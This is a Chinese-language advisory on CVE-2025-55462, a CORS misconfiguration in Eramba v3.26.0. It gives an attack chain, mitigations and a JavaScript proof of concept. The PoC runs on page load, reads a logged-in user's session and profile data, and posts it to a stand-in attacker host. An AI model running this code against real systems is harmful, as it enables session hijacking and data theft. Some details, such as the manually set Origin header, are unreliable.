CVE-2025-55462 Eramba CORS配置错误导致敏感信息泄露及会话劫持

漏洞信息

漏洞编号

CVE-2025-55462

漏洞类型

CORS配置错误

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Eramba Community and Enterprise Editions

漏洞概述

CVE-2025-55462是Eramba Community和Enterprise Editions v3.26.0版本中存在的一个严重CORS（跨域资源共享）配置错误漏洞。该漏洞源于应用程序错误地将攻击者控制的Origin请求头反射到Access-Control-Allow-Origin响应头中，并同时设置了Access-Control-Allow-Credentials: true。这种不当配置使得恶意第三方网站能够绕过同源策略限制，以受害用户的身份执行经过身份验证的跨域API请求。攻击者可利用此漏洞针对/system-api/login和/system-api/user/me等敏感API端点发起攻击，成功获取用户的会话标识符、个人信息（ID、姓名、邮箱）以及访问组权限等敏感数据。攻击过程无需用户交互（除访问恶意页面外），一旦攻击者获取到会话数据，即可实现完整的会话劫持和敏感信息窃取，对企业用户的数据安全和隐私构成严重威胁。该漏洞影响默认安装配置，无需任何特殊定制即可被利用。

技术细节

该漏洞的核心问题在于Eramba应用程序的CORS策略实现存在严重缺陷。正常情况下，CORS机制要求服务器明确指定允许的源域名列表，而非盲目信任客户端提交的Origin头。然而，Eramba v3.26.0在处理跨域请求时，直接将请求中的Origin头值反射到Access-Control-Allow-Origin响应头，同时错误地启用了Access-Control-Allow-Credentials选项。当用户已登录Eramba并访问恶意网页时，恶意JavaScript代码可以构造带有Origin头的AJAX请求。由于响应中包含用户的认证凭证信息（如会话Cookie），浏览器会自动携带这些凭证。服务器端错误配置导致响应中包含Reflected-Origin和Access-Control-Allow-Credentials: true，浏览器因此允许前端JavaScript读取响应内容。攻击者通过解析响应即可提取session_id、user_id、name、email、access_groups等敏感信息，进而利用这些会话数据冒充合法用户执行未授权操作。整个攻击过程完全依赖浏览器的标准CORS机制和JavaScript的XMLHttpRequest/Fetch API，无需任何特殊浏览器设置或用户额外授权。

攻击链分析

STEP 1

步骤1：用户认证

受害者首先正常登录Eramba系统，系统为其创建会话并设置认证Cookie

STEP 2

步骤2：诱导访问

攻击者通过钓鱼邮件、恶意链接或被植入恶意代码的第三方网站诱导已登录用户访问

STEP 3

步骤3：构造跨域请求

受害者浏览器加载攻击者控制的页面后，执行恶意JavaScript代码，构造带有攻击者控制Origin头的跨域API请求（目标指向Eramba的/system-api/user/me等端点）

STEP 4

步骤4：CORS响应处理

Eramba服务器错误地将攻击者指定的Origin反射到Access-Control-Allow-Origin响应头，并设置Access-Control-Allow-Credentials: true

STEP 5

步骤5：浏览器策略绕过

由于服务器响应包含正确的CORS头且允许携带凭证，浏览器允许前端JavaScript读取响应内容

STEP 6

步骤6：数据窃取

恶意JavaScript成功读取包含session_id、user_id、name、email、access_groups等敏感信息的API响应

STEP 7

步骤7：会话劫持

攻击者利用窃取的会话信息（如session_id）冒充受害者执行未授权操作或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-55462 CORS Misconfiguration PoC for Eramba
// This PoC demonstrates how an attacker can exploit CORS misconfiguration
// to steal session data from authenticated Eramba users

const TARGET_ORIGIN = 'https://eramba.example.com';
const MALICIOUS_ORIGIN = 'https://attacker-controlled-site.com';

// Function to make authenticated CORS request
async function exploitCorsVulnerability() {
    console.log('[+] Starting CORS exploitation for CVE-2025-55462');
    
    // Try to fetch user profile data via CORS
    const endpoints = [
        '/system-api/user/me',
        '/system-api/login',
        '/api/profile'
    ];
    
    for (const endpoint of endpoints) {
        try {
            console.log(`[*] Attempting to fetch: ${endpoint}`);
            
            // Craft the CORS request with credentials
            const response = await fetch(`${TARGET_ORIGIN}${endpoint}`, {
                method: 'GET',
                mode: 'cors',
                credentials: 'include', // Include cookies for authenticated request
                headers: {
                    'Origin': MALICIOUS_ORIGIN
                }
            });
            
            if (response.ok) {
                const data = await response.json();
                console.log('[+] Success! Extracted data:');
                console.log(JSON.stringify(data, null, 2));
                
                // Extract sensitive session information
                if (data.session_id || data.id) {
                    const sessionInfo = {
                        session_id: data.session_id || data.id,
                        user_id: data.id,
                        name: data.name,
                        email: data.email,
                        access_groups: data.access_groups
                    };
                    console.log('[+] Session hijacking data collected:', sessionInfo);
                    
                    // Send stolen data to attacker server
                    await reportStolenData(sessionInfo);
                }
            } else {
                console.log(`[-] Request failed with status: ${response.status}`);
            }
        } catch (error) {
            console.log(`[-] Error fetching ${endpoint}: ${error.message}`);
        }
    }
}

// Function to report stolen data to attacker
async function reportStolenData(data) {
    // Send stolen session data to attacker-controlled endpoint
    await fetch('https://attacker-controlled-site.com/collect', {
        method: 'POST',
        mode: 'no-cors',
        body: JSON.stringify(data)
    });
}

// Trigger exploitation when page loads
window.onload = exploitCorsVulnerability;

// Alternative PoC using XMLHttpRequest
function xmlHttpRequestPoc() {
    const xhr = new XMLHttpRequest();
    xhr.open('GET', TARGET_ORIGIN + '/system-api/user/me', true);
    xhr.withCredentials = true; // Include credentials
    xhr.setRequestHeader('Origin', MALICIOUS_ORIGIN);
    
    xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
            const response = JSON.parse(xhr.responseText);
            console.log('Stolen data:', response);
            // Extract and exfiltrate session data
        }
    };
    
    xhr.send();
}

影响范围

Eramba Community Edition v3.26.0

Eramba Enterprise Edition v3.26.0

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1）配置反向代理或WAF限制外部对API端点的直接访问；2）实施IP白名单策略限制管理后台访问来源；3）启用严格的会话管理策略如会话超时、IP绑定、User-Agent验证等；4）监控异常API访问模式和跨域请求日志；5）限制VPN或内网环境访问Eramba系统；6）考虑临时禁用不必要的跨域功能。但这些措施仅为临时缓解，最根本的解决方案仍是尽快升级到官方发布的修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-55462
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-55462
3 Details https://www.cvedetails.com/cve/CVE-2025-55462/
4 VulDB https://vuldb.com/cve/CVE-2025-55462
5 Link http://eramba.com
6 Link https://discussions.eramba.org/t/release-3-28-0/7860